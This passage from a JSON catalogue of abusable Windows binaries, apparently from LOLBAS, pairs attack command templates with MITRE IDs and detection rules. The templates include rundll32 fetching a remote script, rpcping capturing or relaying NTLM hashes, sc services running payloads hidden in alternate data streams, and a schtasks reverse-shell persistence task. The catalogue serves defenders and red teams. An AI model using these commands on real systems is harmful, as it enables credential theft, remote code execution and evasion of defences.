retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:replace-exe:1","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A","description":"Download/Copy executable to specified folder","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote server"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml"}],"references":["https://twitter.com/elceef/status/986334113941655553","https://twitter.com/elceef/status/986842299861782529","https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:reset-exe:0","toolId":"lolbas:reset-exe","toolName":"Reset.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"reset.exe session","description":"Once executed, `reset.exe` will execute `rwinsta.exe` in the same folder. Thus, if `reset.exe` is copied to a folder and an arbitrary executable is renamed to `rwinsta.exe`, `reset.exe` will spawn it.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"reset.exe being executed and executes rwinsta.exe outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rpcping-exe:0","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM","description":"Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.","usecase":"Capture credentials on a non-standard port","mitre":["T1003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rpcping-exe:1","toolId":"lolbas:rpcping-exe","toolName":"Rpcping.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM","description":"Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).","usecase":"Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port","mitre":["T1187"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"}],"references":["https://github.com/vysec/RedTips","https://twitter.com/vysecurity/status/974806438316072960","https://twitter.com/vysecurity/status/873181705024266241","https://twitter.com/splinter_code/status/1421144623678988298","https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:0","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH},EntryPoint","description":"First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.","usecase":"Execute DLL file","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:1","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe {PATH_SMB:.dll},EntryPoint","description":"Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.","usecase":"Execute DLL from SMB share.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:2","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:{REMOTEURL}\")","description":"Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.","usecase":"Execute code from Internet","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:3","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"rundll32 \"{PATH}:ADSDLL.dll\",DllMain","description":"Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).","usecase":"Execute code from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:rundll32-exe:4","toolId":"lolbas:rundll32-exe","toolName":"Rundll32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rundll32.exe -sta {CLSID}","description":"Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.","usecase":"Execute a DLL/EXE COM server payload or ScriptletURL code.","mitre":["T1218.011"],"privilege":"user","fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml"},{"type":"IOC","value":"Outbount Internet/network connections made from rundll32"},{"type":"IOC","value":"Suspicious use of cmdline flags such as -sta"}],"references":["https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/","https://github.com/sailay1996/expl-bin/blob/master/obfus.md","https://github.com/sailay1996/misc-bin/blob/master/rundll32.md","https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90","https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code","https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runexehelper-exe:0","toolId":"lolbas:runexehelper-exe","toolName":"Runexehelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runexehelper.exe {PATH_ABSOLUTE:.exe}","description":"Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\runexehelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"},{"type":"IOC","value":"c:\\windows\\system32\\runexehelper.exe is run"},{"type":"IOC","value":"Existence of runexewithargs_output.txt file"}],"references":["https://twitter.com/0gtweet/status/1206692239839289344","https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runonce-exe:0","toolId":"lolbas:runonce-exe","toolName":"Runonce.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Runonce.exe /AlternateShellStartup","description":"Executes a Run Once Task that has been configured in the registry.","usecase":"Persistence, bypassing defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml"},{"type":"IOC","value":"Registy key add - HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\YOURKEY"}],"references":["https://twitter.com/pabraeken/status/990717080805789697","https://cmatskas.com/configure-a-runonce-task-on-windows/","https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:runscripthelper-exe:0","toolId":"lolbas:runscripthelper-exe","toolName":"Runscripthelper.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"runscripthelper.exe surfacecheck \\\\?\\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}","description":"Execute the PowerShell script with .txt extension","usecase":"Bypass constrained language mode and execute Powershell script","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Event ID 4104 - Microsoft-Windows-PowerShell/Operational"},{"type":"IOC","value":"Event ID 400 - Windows PowerShell"}],"references":["https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc","https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sc-exe:0","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc create evilservice binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" DisplayName= \"evilservice\" start= auto\\ & sc start evilservice","description":"Creates a new service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sc-exe:1","toolId":"lolbas:sc-exe","toolName":"Sc.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"sc config {ExistingServiceName} binPath=\"\\\"c:\\\\ADS\\\\file.txt:cmd.exe\\\" /c echo works > \\\"c:\\ADS\\works.txt\\\"\" & sc start {ExistingServiceName}","description":"Modifies an existing service and executes the file stored in the ADS.","usecase":"Execute binary file hidden inside an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml"},{"type":"IOC","value":"Unexpected service creation"},{"type":"IOC","value":"Unexpected service modification"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:schtasks-exe:0","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr \"{CMD}\"","description":"Create a recurring task to execute every minute.","usecase":"Create a recurring task to keep reverse shell session(s) alive","mitre":["T1053.005"],"privilege":"user","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:schtasks-exe:1","toolId":"lolbas:schtasks-exe","toolName":"Schtasks.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"schtasks /create /s targetmachine /tn \"MyTask\" /tr \"{CMD}\" /sc daily","description":"Create a scheduled task on a remote computer for persistence/lateral movement","usecase":"Create a remote task to run daily relative to the the time of creation","mitre":["T1053.005"],"privilege":"admin","fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml"},{"type":"IOC","value":"Suspicious task creation events"}],"references":["https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/","https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scp-exe:0","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scp-exe:1","toolId":"lolbas:scp-exe","toolName":"scp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"scp.exe -S \"{CMD}\" . localhost:.","description":"Spawns specified command from `scp.exe` -> `ssh.exe`, even if no SSH server is running on localhost (or any other address specified).","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`scp.exe` executions referencing `ProxyCommand`."}],"references":["https://gtfobins.org/gtfobins/scp/","https://lolbas-project.github.io/lolbas/Binaries/scp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scriptrunner-exe:0","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Scriptrunner.exe -appvscript {PATH:.exe}","description":"Executes executable","usecase":"Execute binary through proxy binary to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:scriptrunner-exe:1","toolId":"lolbas:scriptrunner-exe","toolName":"Scriptrunner.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ScriptRunner.exe -appvscript {PATH_SMB:.cmd}","description":"Executes cmd file from remote server","usecase":"Execute binary through proxy binary from external server to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml"},{"type":"IOC","value":"Scriptrunner.exe should not be in use unless App-v is deployed"}],"references":["https://twitter.com/KyleHanslovan/status/914800377580503040","https://twitter.com/NickTyrer/status/914234924655312896","https://github.com/MoooKitty/Code-Execution","https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 